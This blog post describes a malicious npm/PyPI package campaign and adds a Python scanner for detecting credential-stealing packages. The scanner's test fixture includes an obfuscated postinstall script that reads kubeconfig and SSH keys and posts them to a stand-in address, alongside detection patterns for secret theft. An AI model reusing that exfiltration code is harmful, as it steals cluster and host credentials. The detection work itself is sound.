Cybersecurity · 3 min read

The npm and PyPI Heist: When Code Repos Turn Into Spy Agencies

The Plot Thickens: A Tale of Sensitive Data Exfiltration

Greetings, cyber sleuths and code wranglers! Buckle up, because we're diving into a story that's got more twists and turns than a JavaScript callback function. Our friends at Phylum have stumbled upon a multi-ecosystem campaign that's sneakier than a ninja in a dark room. This bad boy aims to exfiltrate sensitive machine information to a remote server. And guess what? It's still ongoing! So, let's break it down, shall we?

The Genesis Block: How It All Began

On a seemingly ordinary day, September 12, 2023, Phylum's automated risk detection platform rang the alarm bells. A package with the mysterious name of [REDACTED] appeared on npm and PyPI. It contained just four files, including an obfuscated index.js. Ah, obfuscation, the dark art of making your code look like alphabet soup!

Deobfuscating the file revealed code that reads kubeconfig files and SSH keys and posts them to a remote URL. Those are not just "sensitive data": a kubeconfig carries cluster credentials and an SSH private key carries host access, so one install on a developer laptop or CI runner can hand the attacker a path into production. Over the following two weeks, the actor made 46 publications across 39 distinct package names. It's like the attacker was trying to build the Avengers of malicious packages!
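To make the "deobfuscate, then look for the credential reads and the outbound call" step concrete, here is an added example of a small heuristic scanner. It is not Phylum's tooling and not code from the campaign; the sample package, its hex-escaped strings, the `203.0.113.5` documentation address, the list of paths beyond kubeconfig and SSH keys, and the hex-escape threshold are all constructed assumptions for the example.

```python
"""Heuristic scanner for an npm package directory: flags install hooks,
references to kubeconfig / SSH key paths, outbound network sinks and common
JavaScript obfuscation. Hex escapes and String.fromCharCode() are decoded
first so strings hidden behind them are still matched (added example)."""
import json
import re

# kubeconfig and SSH keys are the paths the campaign read; the others are
# assumptions added here to make the check more generally useful.
SENSITIVE_PATHS = [
    r"\.kube/config", r"\bKUBECONFIG\b", r"\.ssh/", r"\bid_rsa\b",
    r"\bid_ed25519\b", r"\.npmrc\b", r"\.aws/credentials",
]
NETWORK_SINKS = [
    r"https?://[^\s'\"`]+", r"require\(['\"]https?['\"]\)",
    r"\bfetch\(", r"\.request\(", r"\bXMLHttpRequest\b",
]
OBFUSCATION = [r"String\.fromCharCode", r"\beval\(", r"\bnew Function\(", r"\batob\("]
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_js_escapes(src):
    """Resolve \\xNN and \\uNNNN escapes and literal String.fromCharCode(n, ...)
    calls so the strings they hide can be matched as plain text."""
    out = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)
    out = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), out)
    return re.sub(
        r"String\.fromCharCode\(([\d,\s]+)\)",
        lambda m: '"' + "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1))) + '"',
        out,
    )


def _hits(patterns, text):
    return sorted({m.group(0) for p in patterns for m in re.finditer(p, text)})


def scan_package(files):
    """files maps a relative path to its text content. Returns a report dict."""
    report = {"install_hooks": [], "sensitive_paths": [], "network_sinks": [],
              "obfuscation": [], "verdict": "clean"}
    if "package.json" in files:
        try:
            scripts = json.loads(files["package.json"]).get("scripts", {})
        except json.JSONDecodeError:
            scripts = {}
        report["install_hooks"] = [f"{h}: {scripts[h]}" for h in INSTALL_HOOKS if h in scripts]
    for path, text in files.items():
        if not path.endswith((".js", ".cjs", ".mjs")):
            continue
        decoded = decode_js_escapes(text)
        report["sensitive_paths"] += [f"{path}: {h}" for h in _hits(SENSITIVE_PATHS, decoded)]
        report["network_sinks"] += [f"{path}: {h}" for h in _hits(NETWORK_SINKS, decoded)]
        report["obfuscation"] += [f"{path}: {h}" for h in _hits(OBFUSCATION, text)]
        n_hex = len(HEX_ESCAPE.findall(text))
        if n_hex >= 8:  # threshold is an assumption; tune it for your corpus
            report["obfuscation"].append(f"{path}: {n_hex} hex-escaped characters")
    # Credential path + network sink together is the exfiltration signature.
    if report["sensitive_paths"] and report["network_sinks"]:
        report["verdict"] = "exfiltration-suspect"
    elif any(report[k] for k in ("install_hooks", "sensitive_paths", "network_sinks", "obfuscation")):
        report["verdict"] = "review"
    return report


# Constructed sample modelled on the behaviour described in the post: a
# postinstall hook runs an obfuscated index.js that reads ~/.kube/config and
# ~/.ssh/id_rsa and POSTs them. 203.0.113.5 is a documentation-only address.
MALICIOUS_PACKAGE = {
    "package.json": json.dumps({"name": "example-pkg", "version": "1.0.0",
                                "scripts": {"postinstall": "node index.js"}}),
    "index.js": r'''var _0x4f=["\x2e\x6b\x75\x62\x65\x2f\x63\x6f\x6e\x66\x69\x67",
"\x68\x74\x74\x70\x73\x3a\x2f\x2f203.0.113.5/collect"];
var os=require("os"),fs=require("fs"),h=require("https");
var k=fs.readFileSync(os.homedir()+"/"+_0x4f[0]).toString();
var s=fs.readFileSync(os.homedir()+"/.ssh/"+String.fromCharCode(105,100,95,114,115,97)).toString();
h.request(_0x4f[1],{method:"POST"}).end(JSON.stringify({k:k,s:s,host:os.hostname()}));
''',
}
# Constructed benign package for contrast.
BENIGN_PACKAGE = {
    "package.json": json.dumps({"name": "tiny-add", "version": "1.0.0", "main": "index.js"}),
    "index.js": "module.exports = function add(a, b) { return a + b; };\n",
}

if __name__ == "__main__":
    for name, pkg in (("malicious", MALICIOUS_PACKAGE), ("benign", BENIGN_PACKAGE)):
        print(name, json.dumps(scan_package(pkg), indent=2))
```

Run it on an unpacked tarball (`npm pack <name>` then extract) by loading each file into the dict; the point is that neither the credential paths nor the callback URL appear in the raw source, and only after decoding the escapes do both show up together, which is the combination worth blocking at install time.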
